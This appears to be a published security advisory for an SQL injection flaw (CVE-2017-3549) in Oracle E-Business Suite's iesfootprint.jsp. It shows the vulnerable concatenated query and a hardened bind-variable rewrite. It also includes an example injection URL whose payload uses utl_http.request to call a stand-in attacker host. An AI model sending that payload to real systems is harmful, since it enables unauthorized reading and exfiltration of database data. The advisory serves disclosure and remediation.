Application: Oracle E-Business Suite
Versions Affected: Oracle EBS 12.2.3
Vendor: Oracle
Bugs: SQL injection
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Authors: Dmitry Chastuhin (ERPScan)
Class: SQL injection
Impact: read sensitive data, modify or delete data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-3549
CVSS Base Score v3: 9.1 / 10
CVSS Base Vector:

| CVSS v3 metric | Value |
|---|---|
| AV: Attack Vector (Related exploit range) | Network (N) |
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | High (H) |
| I: Impact to Integrity | High (H) |
| A: Impact to Availability | None (N) |
The code builds an SQL statement by concatenating strings that an attacker can control. The manipulated SQL statement can then be used to retrieve additional data from the database or to modify data without authorization.

Affected version: Oracle EBS 12.2.3

Fix: apply Oracle CPU April 2017.

The vulnerable JSP is iesfootprint.jsp; the relevant fragment is shown below.
```jsp
deployDate = ((request.getParameter("deployDate")) != null) ? request.getParameter("deployDate") : "";
responseDate = ((request.getParameter("responseDate")) != null) ? request.getParameter("responseDate") : "";
dscriptName = ((request.getParameter("dscript_name")) != null) ? request.getParameter("dscript_name") : "";
dscriptId = ((request.getParameter("dscriptId")) != null) ? request.getParameter("dscriptId") : "";
%>
<%
// Process the data based on params
if (showGraph) {
    // Create Query String
    StringBuffer query = new StringBuffer("SELECT panel_name, count_panels, avg_time, min_time, max_time, ");
    query.append("'").append(_prompts[10]).append("'");
    query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = ");
    query.append(dscriptId);                              // raw request parameter, concatenated unquoted
    query.append(" AND start_time between ");
    query.append("'").append(deployDate).append("'");     // raw request parameter inside a string literal
    query.append(" and ");
    query.append("'").append(responseDate).append("'");   // raw request parameter inside a string literal
    query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11");
    // Get XMLDocument for the corresponding query and Paint graph
    try {
        XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());   // executes the concatenated SQL
        htmlString = XMLServ.getXMLTransform(xmlDoc, htmlURL);
```
Approximate request with SQL injection:

```
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) --
```
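As an added example, not Oracle's code and not part of the advisory, here is the same query written with JDBC bind variables and typed validation of the three request parameters. It assumes a JDBC Connection to the EBS schema and a `yyyy-MM-dd HH:mm:ss` date format (the JSP's real format is not shown); the `_prompts[10]` label column is omitted because it is not user input.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Timestamp;
import java.time.LocalDateTime;
import java.time.format.DateTimeFormatter;
import java.time.format.DateTimeParseException;

// Hardened rewrite of the iesfootprint.jsp query (added example, not Oracle's code).
// Assumed: a JDBC Connection to the EBS schema and dates sent as "yyyy-MM-dd HH:mm:ss";
// the _prompts[10] label column is server-side text, not user input, and is omitted.
public final class FootprintReport {
    private static final DateTimeFormatter FMT = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss");
    // Request parameters appear only as bind placeholders: a value like "11' AND ..."
    // can no longer alter the statement, it simply fails the numeric check below.
    private static final String SQL =
        "SELECT panel_name, count_panels, avg_time, min_time, max_time FROM ("
      + " SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM ("
      + "  SELECT panel_name, COUNT(panel_name) count_panels,"
      + "         (SUM(total_time)/COUNT(panel_name))/1000 avg_time,"
      + "         MIN(min_time)/1000 min_time, MAX(max_time)/1000 max_time"
      + "    FROM IES_SVY_FOOTPRINT_V"
      + "   WHERE dscript_id = ? AND start_time BETWEEN ? AND ?"
      + "   GROUP BY panel_name ORDER BY avg_time DESC)) WHERE rownum < 11";

    // dscript_id is numeric, so reject anything that is not a plain integer before binding.
    static long parseDscriptId(String raw) {
        if (raw == null || !raw.matches("\\d{1,18}")) {
            throw new IllegalArgumentException("dscriptId must be a positive integer");
        }
        return Long.parseLong(raw);
    }
    // Dates become a typed TIMESTAMP, so the database never sees the raw string at all.
    static Timestamp parseDate(String raw, String name) {
        try {
            return Timestamp.valueOf(LocalDateTime.parse(raw, FMT));
        } catch (NullPointerException | DateTimeParseException e) {
            throw new IllegalArgumentException(name + " must be yyyy-MM-dd HH:mm:ss");
        }
    }
    // Returns the bound statement; the caller executes and closes it (try-with-resources).
    public static PreparedStatement bind(Connection conn, String dscriptId,
                                         String deployDate, String responseDate) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(SQL);
        ps.setLong(1, parseDscriptId(dscriptId));
        ps.setTimestamp(2, parseDate(deployDate, "deployDate"));
        ps.setTimestamp(3, parseDate(responseDate, "responseDate"));
        return ps; // the values travel separately from the SQL text
    }
}
```

With this shape, the request shown above is rejected by parseDscriptId before any SQL is sent, and even an unvalidated value could only be compared as data, never parsed as part of the statement.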